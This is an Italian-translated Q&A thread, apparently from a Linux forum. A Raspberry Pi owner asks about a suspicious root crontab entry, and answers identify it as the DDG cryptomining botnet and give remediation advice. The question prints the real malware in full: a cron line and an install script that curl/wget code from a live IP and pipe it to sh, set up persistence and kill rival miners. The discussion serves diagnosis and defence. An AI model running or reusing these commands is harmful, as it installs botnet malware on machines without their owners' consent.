Voce crontab sospetta che esegue "xribfa4" ogni 15 minuti


59

Volevo aggiungere qualcosa al mio file crontab di root sul mio Raspberry Pi, e ho trovato una voce che mi sembra sospetta, cercando parti di esso su Google non ha trovato nulla.

Voce Crontab:

*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh

I contenuti di http://103.219.112.66:8000/i.shsono:

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root

cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable

export PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep xribfa4 || rm -rf xribfa4
if [ ! -f "xribfa4" ]; then
    curl -fsSL -m1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -o xribfa4||wget -q -T1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -O xribfa4
fi
chmod +x xribfa4
/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4

ps auxf | grep -v grep | grep xribbcb | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcc | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbce | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa0 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa1 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa2 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa3 | awk '{print $2}' | xargs kill -9

echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" | crontab -

La mia conoscenza di Linux è limitata, ma a me sembra che scaricare binari da un server indonesiano ed eseguirli come root regolarmente non sia una cosa normale.

Cos'è questo? Cosa dovrei fare?


16
È circolare. Ogni 15 minuti scarica e installa una nuova copia di se stesso. Se / quando la copia sul server remoto viene modificata, tutti i server che eseguono questo cronjob eseguiranno qualunque sia il nuovo codice, entro 15 minuti.
Carattere jolly

5
Il tuo lampone pi è aperto su Internet? Qual è il tuo raspberry pi in esecuzione? Questo è l'unico risultato su Google quando cerco xribfa4. Se non si esegue software che deve eseguire questa operazione, è probabile che si tratti di un virus.
kemotep,

6
@kemotep quella stringa è casuale, ma google per l'IP e dà alcuni risultati. Qualcosa su una botnet di mining ddg
frostschutz,

9
L'ho trovato. È folle che l'IP sia registrato su un sito del governo indonesiano. Sembra anche che ci siano quasi 2000 altri ips che consegnano questo payload.
kemotep,

21
La cosa principale di cui devi essere consapevole è che anche se rimuovi quella voce crontab, il tuo sistema molto probabilmente ha ancora la vulnerabilità che gli ha permesso di essere infettato. Devi trovare e correggere quella vulnerabilità.
Hans-Martin Mosner,

Risposte:


79

È una botnet di mining DDG, come funziona:

  1. sfruttando una vulnerabilità RCE
  2. modifica del crontab
  3. scaricare il programma di mining appropriato (scritto con go)
  4. avviare il processo di mining

DDG: una botnet di data mining rivolta ai server di database

SystemdMiner quando una botnet prende in prestito l'infrastruttura di un'altra botnet

U&L: come posso uccidere malware minerd su un'istanza di AWS EC2? (server compromesso)


4
Sì, in realtà sembra che sia così. Grazie! Contrassegnerà questa come una risposta, se non arrivano novità.
Peter Dam,

8
Non dimenticare i soliti consigli per una macchina radicata: prova a capire come sono entrati in modo da poter riparare il buco. Impara da questo e aumenta la tua sicurezza. Infine, annulla e reinstalla la macchina.
marzo

3
La buona notizia è che non sembrano avere un minatore per il Pi, solo per i686 e x86_64.
Segna il

13
@Mark Com'è questa buona notizia? Qualcuno ha ottenuto il pieno controllo del proprio Pi utilizzando un punto di ingresso sconosciuto e ha avuto pieno accesso a tutti i segreti sul Pi (incluso ma non limitato alle password). Se il minatore corre o meno è davvero nel regno del "piccolo inconveniente".
marzo

4
@marcelm, l'attaccante ha ottenuto il pieno controllo su di esso, e quindi quasi certamente non ha fatto nulla di significativo con quel controllo.
Segna il

2

Scopri quali porte TCP e UDP sono effettivamente necessarie, quindi blocca tutte le altre porte nel firewall del router. Probabilmente , quelle voci crontab non riappaiono.

Puoi vedere quali porte sono aperte e pubbliche usando Shields Up! funzione su grc.com .


5
Oppure potrebbe correggere la vulnerabilità.
Harper - Ripristina Monica il

1
@Harper Absolutely! Questo è un dato. Stavo pensando che forse senza prima bloccare le porte inutilizzate, potrebbe essere reinfettato mentre cercava di ripararlo.
Mike Waters,

1
Commento pertinente di security.SE: security.stackexchange.com/questions/147770/…
Wildcard

1
Questo (non limitandosi a solo TCP e UDP, comunque), sempre. Anche modello di sicurezza positivo, whitelist o nega per impostazione predefinita - nega tutto il traffico che non usi esplicitamente o di cui hai bisogno - l'unico modo per garantire che nessuno dei tuoi buchi sia esposto alla penetrazione.
antichris,
Utilizzando il nostro sito, riconosci di aver letto e compreso le nostre Informativa sui cookie e Informativa sulla privacy.
Licensed under cc by-sa 3.0 with attribution required.